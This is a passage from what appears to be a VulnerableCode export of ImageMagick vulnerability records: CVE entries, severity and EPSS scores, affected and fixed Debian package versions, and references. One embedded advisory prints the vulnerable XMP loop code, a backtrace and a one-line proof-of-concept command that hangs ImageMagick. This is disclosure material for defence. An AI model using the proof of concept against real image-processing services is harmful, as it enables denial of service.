scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/commit/8d4c67a90ae458fb36393a05c0069e9123ac174c

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/commit/8d4c67a90ae458fb36393a05c0069e9123ac174c

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xwc6-v6g8-pw2h

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xwc6-v6g8-pw2h

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-25966

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-25966

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2442122
reference_id	2442122
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2442122

reference_url

https://github.com/advisories/GHSA-xwc6-v6g8-pw2h

reference_id

GHSA-xwc6-v6g8-pw2h

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-xwc6-v6g8-pw2h

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u6?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u6?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u6%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.15%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.15%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.15%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-25966, GHSA-xwc6-v6g8-pw2h

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5xqd-gf3b-4ygw

url VCID-6qqv-wf7w-xfaf

vulnerability_id VCID-6qqv-wf7w-xfaf

summary ImageMagick: heap-based buffer overflow at MagickCore/pixel-accessor.h in SetPixelViaPixelInfo because of a MagickCore/enhance.c error

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13298.json

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13298.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-13298

reference_id

reference_type

scores

value	0.00514
scoring_system	epss
scoring_elements	0.66624
published_at	2026-04-26T12:55:00Z

value	0.00514
scoring_system	epss
scoring_elements	0.66585
published_at	2026-04-21T12:55:00Z

value	0.00514
scoring_system	epss
scoring_elements	0.66609
published_at	2026-04-24T12:55:00Z

value	0.00524
scoring_system	epss
scoring_elements	0.66893
published_at	2026-04-07T12:55:00Z

value	0.00524
scoring_system	epss
scoring_elements	0.66941
published_at	2026-04-08T12:55:00Z

value	0.00524
scoring_system	epss
scoring_elements	0.66954
published_at	2026-04-09T12:55:00Z

value	0.00524
scoring_system	epss
scoring_elements	0.66974
published_at	2026-04-11T12:55:00Z

value	0.00524
scoring_system	epss
scoring_elements	0.6696
published_at	2026-04-12T12:55:00Z

value	0.00524
scoring_system	epss
scoring_elements	0.66929
published_at	2026-04-13T12:55:00Z

value	0.00524
scoring_system	epss
scoring_elements	0.66962
published_at	2026-04-16T12:55:00Z

value	0.00524
scoring_system	epss
scoring_elements	0.66977
published_at	2026-04-18T12:55:00Z

value	0.00524
scoring_system	epss
scoring_elements	0.66855
published_at	2026-04-01T12:55:00Z

value	0.00524
scoring_system	epss
scoring_elements	0.66919
published_at	2026-04-04T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-13298

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1730590
reference_id	1730590
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1730590

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-13298

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6qqv-wf7w-xfaf

url VCID-6t7d-2hre-sqbw

vulnerability_id VCID-6t7d-2hre-sqbw

summary

ImageMagick has XMP profile write that triggers hang due to unbounded loop
### Summary
Infinite lines occur when writing during a specific XMP file conversion command
### Details
```
#0  GetXmpNumeratorAndDenominator (denominator=<optimized out>, numerator=<optimized out>, value=<optimized out>) at MagickCore/profile.c:2578
#1  GetXmpNumeratorAndDenominator (denominator=<synthetic pointer>, numerator=<synthetic pointer>, value=720000000000000) at MagickCore/profile.c:2564
#2  SyncXmpProfile (image=image@entry=0x555555bb9ea0, profile=0x555555b9d020) at MagickCore/profile.c:2605
#3  0x00005555555db5cf in SyncImageProfiles (image=image@entry=0x555555bb9ea0) at MagickCore/profile.c:2651
#4  0x0000555555798d4f in WriteImage (image_info=image_info@entry=0x555555bc2050, image=image@entry=0x555555bb9ea0, exception=exception@entry=0x555555b7bea0) at MagickCore/constitute.c:1288
#5  0x0000555555799862 in WriteImages (image_info=image_info@entry=0x555555bb69c0, images=<optimized out>, images@entry=0x555555bb9ea0, filename=<optimized out>, exception=0x555555b7bea0) at MagickCore/constitute.c:1575
#6  0x00005555559650c4 in CLINoImageOperator (cli_wand=cli_wand@entry=0x555555b85790, option=option@entry=0x5555559beebe "-write", arg1n=arg1n@entry=0x7fffffffe2c7 "a.mng", arg2n=arg2n@entry=0x0) at MagickWand/operation.c:4993
#7  0x0000555555974579 in CLIOption (cli_wand=cli_wand@entry=0x555555b85790, option=option@entry=0x5555559beebe "-write") at MagickWand/operation.c:5473
#8  0x00005555559224aa in ProcessCommandOptions (cli_wand=cli_wand@entry=0x555555b85790, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8, index=index@entry=1) at MagickWand/magick-cli.c:758
#9  0x000055555592276d in MagickImageCommand (image_info=image_info@entry=0x555555b824a0, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8, metadata=metadata@entry=0x7fffffffbc10, exception=exception@entry=0x555555b7bea0) at MagickWand/magick-cli.c:1392
#10 0x00005555559216a0 in MagickCommandGenesis (image_info=image_info@entry=0x555555b824a0, command=command@entry=0x555555922640 <MagickImageCommand>, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8, metadata=0x0, exception=exception@entry=0x555555b7bea0) at MagickWand/magick-cli.c:177
#11 0x000055555559f76b in MagickMain (argc=3, argv=0x7fffffffdfa8) at utilities/magick.c:162
#12 0x00007ffff700fd90 in __libc_start_call_main (main=main@entry=0x55555559aec0 <main>, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8) at ../sysdeps/nptl/libc_start_call_main.h:58
#13 0x00007ffff700fe40 in __libc_start_main_impl (main=0x55555559aec0 <main>, argc=3, argv=0x7fffffffdfa8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdf98) at ../csu/libc-start.c:392
#14 0x000055555559f535 in _start ()
```
```
static void GetXmpNumeratorAndDenominator(double value,
  unsigned long *numerator,unsigned long *denominator)
{
  double
    df;

  *numerator=0;
  *denominator=1;
  if (value <= MagickEpsilon)
    return;
  *numerator=1;
  df=1.0;
  while(fabs(df - value) > MagickEpsilon)
  {
    if (df < value)
      (*numerator)++;
    else
      {
        (*denominator)++;
        *numerator=(unsigned long) (value*(*denominator));
      }
    df=*numerator/(double)*denominator;
  }
}
```
In this code, the loop `while(fabs(df - value) > MagickEpsilon)` keeps repeating endlessly.

### PoC
`magick hang a.mng`
https://drive.google.com/file/d/1iegkwlTjqnJTtM4XkiheYsjKsC6pxtId/view?usp=sharing

### Impact
XMP profile write triggers hang due to unbounded loop


### credits
**Team Pay1oad DVE** 

**Reporter** :  **Shinyoung Won** (with contributions from **WooJin Park, DongHa Lee, JungWoo Park, Woojin Jeon, Juwon Chae**, **Kyusang Han, JaeHun Gou**)

**yosimich(@yosiimich**) **Shinyoung Won** of SSA Lab

e-mail : [yosimich123@gmail.com]

**Woojin Jeon**

Gtihub : brainoverflow

e-mail : [root@brainoverflow.kr]

**WooJin Park**

GitHub : jin-156

e-mail : [1203kids@gmail.com]

**Who4mI(@GAP-dev) Lee DongHa of SSA Lab**

Github: GAP-dev

e-mail : [ceo@zeropointer.co.kr]

**JungWoo Park**

Github : JungWooJJING

e-mail : [cuby5577@gmail.com]

**Juwon Chae** 

Github : I_mho

e-mail : [wndnjs4698@naver.com]

**Kyusang Han**

Github : T1deSEC

e-mail : [hksjoe0081@gmail.com]

**JaeHun Gou**

Github : P2GONE

e-mail : [charly20@naver.com]

### Commits
Fixed in: https://github.com/ImageMagick/ImageMagick/commit/229fa96a988a21d78318bbca61245a6ed1ee33a0 and https://github.com/ImageMagick/ImageMagick/commit/38631605e6ab744548a561797472cf8648bcfe26

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53015.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53015.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-53015

reference_id

reference_type

scores

value	0.00057
scoring_system	epss
scoring_elements	0.17948
published_at	2026-04-08T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.1786
published_at	2026-04-07T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.18161
published_at	2026-04-04T12:55:00Z

value	0.00057
scoring_system	epss
scoring_elements	0.18108
published_at	2026-04-02T12:55:00Z

value	0.00064
scoring_system	epss
scoring_elements	0.19707
published_at	2026-04-26T12:55:00Z

value	0.00064
scoring_system	epss
scoring_elements	0.19922
published_at	2026-04-09T12:55:00Z

value	0.00064
scoring_system	epss
scoring_elements	0.19931
published_at	2026-04-11T12:55:00Z

value	0.00064
scoring_system	epss
scoring_elements	0.19887
published_at	2026-04-12T12:55:00Z

value	0.00064
scoring_system	epss
scoring_elements	0.19829
published_at	2026-04-13T12:55:00Z

value	0.00064
scoring_system	epss
scoring_elements	0.19802
published_at	2026-04-16T12:55:00Z

value	0.00064
scoring_system	epss
scoring_elements	0.19805
published_at	2026-04-18T12:55:00Z

value	0.00064
scoring_system	epss
scoring_elements	0.19818
published_at	2026-04-21T12:55:00Z

value	0.00064
scoring_system	epss
scoring_elements	0.19715
published_at	2026-04-24T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-53015

reference_url

https://drive.google.com/file/d/1iegkwlTjqnJTtM4XkiheYsjKsC6pxtId/view?usp=sharing

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:14:20Z/

url

https://drive.google.com/file/d/1iegkwlTjqnJTtM4XkiheYsjKsC6pxtId/view?usp=sharing

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/commit/229fa96a988a21d78318bbca61245a6ed1ee33a0

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/commit/229fa96a988a21d78318bbca61245a6ed1ee33a0

reference_url

https://github.com/ImageMagick/ImageMagick/commit/38631605e6ab744548a561797472cf8648bcfe26

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/commit/38631605e6ab744548a561797472cf8648bcfe26

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-vmhh-8rxq-fp9g

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:14:20Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-vmhh-8rxq-fp9g

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-53015

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-53015

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339
reference_id	1109339
reference_type
scores
